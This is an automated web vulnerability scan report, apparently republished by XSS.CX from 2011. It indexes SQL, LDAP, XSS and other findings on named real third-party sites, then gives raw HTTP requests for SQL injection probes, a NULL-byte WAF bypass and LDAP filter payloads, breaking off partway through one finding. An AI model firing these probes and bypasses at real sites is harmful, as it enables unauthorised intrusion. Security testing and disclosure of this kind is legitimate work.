XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-02
Report generated by XSS.CX at Sat Sep 17 15:04:34 CDT 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. SQL injection
1.1. http://amch.questionmarket.com/adsc/d913132/5/920375/decide.php [REST URL parameter 5]
1.2. http://app.streamsend.com/public/6EzE/J1l/subscribe [_session_id cookie]
2. LDAP injection
2.1. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php [REST URL parameter 4]
2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
3. Cross-site scripting (stored)
3.1. http://ar.voicefive.com/bmx3/broker.pli [n parameter]
3.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
4. HTTP header injection
5. Cross-site scripting (reflected)
5.1. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]
5.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]
5.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [code parameter]
5.4. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]
5.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]
5.6. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]
5.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [noiframe parameter]
5.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]
5.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]
5.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]
5.11. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [name of an arbitrarily supplied request parameter]
5.12. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p1 parameter]
5.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php [p2 parameter]
5.14. http://amch.questionmarket.com/surveyf/nav.php [code parameter]
5.15. http://amch.questionmarket.com/surveyf/nav.php [link parameter]
5.16. http://amch.questionmarket.com/surveyf/nav.php [name of an arbitrarily supplied request parameter]
5.17. http://amch.questionmarket.com/surveyf/nav.php [orig parameter]
5.18. http://amch.questionmarket.com/surveyf/nav.php [survey_num parameter]
5.19. http://amch.questionmarket.com/surveyf/nav.php [survey_server parameter]
5.20. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bcompany%5D parameter]
5.21. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bemail_address%5D parameter]
5.22. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bfirst_name%5D parameter]
5.23. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Blast_name%5D parameter]
5.24. http://ar.voicefive.com/b/rc.pli [func parameter]
5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]
5.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]
5.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]
5.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]
5.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]
5.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]
5.31. http://blekko.com/autocomplete [query parameter]
5.32. http://d7.zedo.com/jsc/d3/fl.js [l parameter]
5.33. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]
5.34. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 1]
5.35. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 2]
5.36. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 3]
5.37. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]
5.38. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]
5.39. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]
5.40. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]
5.41. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]
5.42. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]
5.43. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]
5.44. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]
5.45. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]
5.46. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]
5.47. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]
5.48. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]
5.49. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]
5.50. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpjs parameter]
5.51. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]
5.52. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]
5.53. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]
5.54. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]
5.55. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]
5.56. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]
5.57. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpjs parameter]
5.58. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]
5.59. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]
5.60. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]
5.61. http://js.revsci.net/gateway/gw.js [csid parameter]
5.62. http://survey.questionmarket.com/surv/913131/newai.php [name of an arbitrarily supplied request parameter]
5.63. http://tps31.doubleverify.com/visit.js [plc parameter]
5.64. http://tps31.doubleverify.com/visit.js [sid parameter]
5.65. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]
5.66. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]
5.67. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
5.68. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
5.69. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]
5.70. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]
5.71. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
5.72. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]
5.73. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
5.74. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
5.75. http://ar.voicefive.com/bmx3/broker.pli [ar_p107223597 cookie]
5.76. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]
5.77. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]
5.78. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]
5.79. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]
5.80. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
5.81. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
5.82. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
5.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]
5.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]
5.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
6. Flash cross-domain policy
6.1. http://adserver.teracent.net/crossdomain.xml
6.2. http://b.scorecardresearch.com/crossdomain.xml
6.3. http://cdn.slidesharecdn.com/crossdomain.xml
6.4. http://cspix.media6degrees.com/crossdomain.xml
6.5. http://pcdn.tcgmsrv.net/crossdomain.xml
6.6. http://pixel.33across.com/crossdomain.xml
6.7. http://s.dlqm.net/crossdomain.xml
6.8. http://s1.2mdn.net/crossdomain.xml
6.9. http://segment-pixel.invitemedia.com/crossdomain.xml
6.10. http://segs.btrll.com/crossdomain.xml
6.11. http://survey.questionmarket.com/crossdomain.xml
6.12. http://www.slideshare.net/crossdomain.xml
7. Silverlight cross-domain policy
7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml
7.2. http://pixel.33across.com/clientaccesspolicy.xml
7.3. http://s1.2mdn.net/clientaccesspolicy.xml
8. Cleartext submission of password
8.1. http://www.peopleschoice.com/pca/polls/poll.jsp
8.2. http://www.peopleschoice.com/pca/vote/
9. XML injection
9.1. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php [REST URL parameter 1]
9.2. http://amch.questionmarket.com/adsc/d913131/10/922738/decide.php [REST URL parameter 1]
9.3. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php [REST URL parameter 1]
9.4. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php [REST URL parameter 1]
9.5. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]
9.6. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]
9.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]
9.8. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]
9.9. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]
9.10. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 1]
9.11. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]
9.12. http://amch.questionmarket.com/favicon.ico [REST URL parameter 1]
9.13. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 1]
9.14. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 2]
9.15. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48 [REST URL parameter 1]
9.16. http://cdn.slidesharecdn.com/profile-photo-MillwardBrownFrance-48x48 [REST URL parameter 1]
10. Session token in URL
10.1. http://www.peopleschoice.com/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__
10.2. http://www.peopleschoice.com/pca/img/pca_poll_bargold_logo.png
10.3. http://www.peopleschoice.com/pca/img/pca_small_email.png
10.4. http://www.peopleschoice.com/pca/polls/poll.jsp
11. Open redirection
12. Cookie without HttpOnly flag set
12.1. http://blekko.com/a/favicon
12.2. http://blekko.com/a/track
12.3. http://blekko.com/autocomplete
12.4. http://www.peopleschoice.com/pca/polls/poll.jsp
12.5. http://adserver.teracent.net/tase/ad
12.6. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew
12.7. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php
12.8. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php
12.9. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php
12.10. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php
12.11. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php
12.12. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
12.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php
12.14. http://amch.questionmarket.com/surveyf/nav.php
12.15. http://ar.voicefive.com/b/wc_beacon.pli
12.16. http://ar.voicefive.com/bmx3/broker.pli
12.17. http://b.scorecardresearch.com/b
12.18. http://b.scorecardresearch.com/r
12.19. http://js.revsci.net/gateway/gw.js
12.20. http://pixel.33across.com/ps/
12.21. http://s.dlqm.net/asdet/read_dlqm_v2.php
12.22. http://segment-pixel.invitemedia.com/set_partner_uid
12.23. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
12.24. http://survey.questionmarket.com/images/survey/progress2/progress_100percent.gif
12.25. http://survey.questionmarket.com/images/survey/qm-red-survey-footer2.gif
12.26. http://survey.questionmarket.com/surv/913131/ai_final.php
12.27. http://survey.questionmarket.com/surv/913131/ai_start.php
12.28. http://survey.questionmarket.com/surv/913131/newai.php
12.29. http://survey.questionmarket.com/surv/913131/slider.js
12.30. http://survey.questionmarket.com/surv/913131/surv.js
12.31. http://survey.questionmarket.com/surv/913131/transparent.php
12.32. http://survey.questionmarket.com/surv/925590/newai.php
12.33. http://survey.questionmarket.com/surv/925590/slider.js
12.34. http://survey.questionmarket.com/surv/925590/surv.js
12.35. http://survey.questionmarket.com/surv/925590/transparent.php
12.36. http://survey.questionmarket.com/veranda/cpd_survey.php
12.37. http://webmedia.oreck.com/cookE/geoip/iframe
13. Password field with autocomplete enabled
13.1. http://www.peopleschoice.com/pca/polls/poll.jsp
13.2. http://www.peopleschoice.com/pca/vote/
14. Cookie scoped to parent domain
14.1. http://adserver.teracent.net/tase/ad
14.2. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew
14.3. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php
14.4. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php
14.5. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php
14.6. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php
14.7. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php
14.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
14.9. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php
14.10. http://amch.questionmarket.com/surveyf/nav.php
14.11. http://ar.voicefive.com/b/wc_beacon.pli
14.12. http://ar.voicefive.com/bmx3/broker.pli
14.13. http://b.scorecardresearch.com/b
14.14. http://b.scorecardresearch.com/r
14.15. http://js.revsci.net/gateway/gw.js
14.16. http://pixel.33across.com/ps/
14.17. http://segment-pixel.invitemedia.com/set_partner_uid
14.18. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
14.19. http://webmedia.oreck.com/cookE/geoip/iframe
15. Cross-domain Referer leakage
15.1. http://amch.questionmarket.com/adscgen/d_layer.php
15.2. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html
15.3. http://survey.questionmarket.com/surv/925590/newai.php
15.4. http://www.peopleschoice.com/pca/polls/poll.jsp
16. Cross-domain script include
16.1. http://blekko.com/
16.2. http://blekko.com/ws/wpp+companies
16.3. http://en.wikipedia.org/wiki/Chromium
16.4. http://en.wikipedia.org/wiki/List_of_country_calling_codes
16.5. http://www.peopleschoice.com/pca/polls/poll.jsp
16.6. http://www.peopleschoice.com/pca/vote/
16.7. http://www.slideshare.net/
16.8. http://www.slideshare.net/MillwardBrown/value-of-a-fan
17. TRACE method is enabled
17.1. http://app.streamsend.com/
17.2. http://cspix.media6degrees.com/
17.3. http://en.wikipedia.org/
17.4. http://pcdn.tcgmsrv.net/
17.5. http://pixel.33across.com/
17.6. http://s.dlqm.net/
17.7. http://segs.btrll.com/
17.8. http://survey.questionmarket.com/
18. Email addresses disclosed
18.1. http://app.streamsend.com/public/6EzE/J1l/subscribe
18.2. http://survey.questionmarket.com/surv/913131/newai.php
18.3. http://survey.questionmarket.com/surv/925590/newai.php
18.4. http://www.slideshare.net/MillwardBrown/value-of-a-fan
19. Credit card numbers disclosed
19.1. http://www.slideshare.net/
19.2. http://www.slideshare.net/MillwardBrown/value-of-a-fan
20. Robots.txt file
20.1. http://adserver.teracent.net/tase/ad
20.2. http://app.streamsend.com/public/6EzE/J1l/subscribe
20.3. http://b.scorecardresearch.com/b
20.4. http://bidder.mathtag.com/notify
20.5. http://blekko.com/autocomplete
20.6. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48
20.7. http://en.wikipedia.org/wiki/Chromium
20.8. http://pixel.33across.com/ps/
20.9. http://s.dlqm.net/asdet/read_dlqm_v2.php
20.10. http://s1.2mdn.net/2992003/09-1213%20Yellow%20Gecko%20728x90.swf
20.11. http://segment-pixel.invitemedia.com/set_partner_uid
20.12. http://survey.questionmarket.com/surv/913131/ai_start.php
20.13. http://www.slideshare.net/MillwardBrown/value-of-a-fan
21. HTML does not specify charset
21.1. http://amch.questionmarket.com/adscgen/d_layer.php
21.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
21.3. http://amch.questionmarket.com/adscgen/endsurvey_disq.php
21.4. http://amch.questionmarket.com/adscgen/st.php
21.5. http://amch.questionmarket.com/adscgen/sta.php
21.6. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php
21.7. http://webmedia.oreck.com/cookE/geoip/iframe
22. Content type incorrectly stated
22.1. http://adserver.teracent.net/tase/ad
22.2. http://amch.questionmarket.com/adscgen/d_layer.php
22.3. http://amch.questionmarket.com/adscgen/dynamiclink.js.php
22.4. http://amch.questionmarket.com/adscgen/st.php
22.5. http://amch.questionmarket.com/adscgen/sta.php
22.6. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php
22.7. http://ar.voicefive.com/b/rc.pli
22.8. http://blekko.com/autocomplete
22.9. http://www.peopleschoice.com/favicon.ico
1. SQL injection
next
There are 2 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:- One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
- Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://amch.questionmarket.com/adsc/d913132/5/920375/decide.php [REST URL parameter 5]
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d913132/5/920375/decide.php |
Issue detail
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d913132/5/920375/decide.php%00'?1&noiframe=1 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0
|
Response 1
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:22:14 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1272
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... </a> about the error.
</dd> ...[SNIP]...
|
Request 2
GET /adsc/d913132/5/920375/decide.php%00''?1&noiframe=1 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0
|
Response 2
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:24:47 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Length: 319 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d913132/5/920375/decide.php was not found on th ...[SNIP]...
|
1.2. http://app.streamsend.com/public/6EzE/J1l/subscribe [_session_id cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://app.streamsend.com |
| Path: |
/public/6EzE/J1l/subscribe |
Issue detail
The _session_id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _session_id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
POST /public/6EzE/J1l/subscribe HTTP/1.1 Host: app.streamsend.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9' Content-Type: application/x-www-form-urlencoded Content-Length: 109
person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up |
Response 1
HTTP/1.1 500 Internal Server Error Date: Sat, 17 Sep 2011 14:47:57 GMT Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14 Cache-Control: no-cache Status: 500 Vary: Accept-Encoding Content-Length: 970 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]...
|
Request 2
POST /public/6EzE/J1l/subscribe HTTP/1.1 Host: app.streamsend.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9'' Content-Type: application/x-www-form-urlencoded Content-Length: 109
person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up |
Response 2
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:47:58 GMT Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.13 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14 ETag: "2ff6ff86037fb7dd17eef608e75be90e" X-Runtime: 148 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9%27%27; path=/; HttpOnly Status: 200 Vary: Accept-Encoding Content-Length: 3535 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT ...[SNIP]...
|
2. LDAP injection
previous
next
There are 2 instances of this issue:
Issue background
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
2.1. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d913132/5/400008029877/decide.php |
Issue detail
The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.
The payloads 29d3cb5aac4a40a9)(sn=* and 29d3cb5aac4a40a9)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adsc/d913132/5/29d3cb5aac4a40a9)(sn=*/decide.php?ord=1316282753 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0
|
Response 1
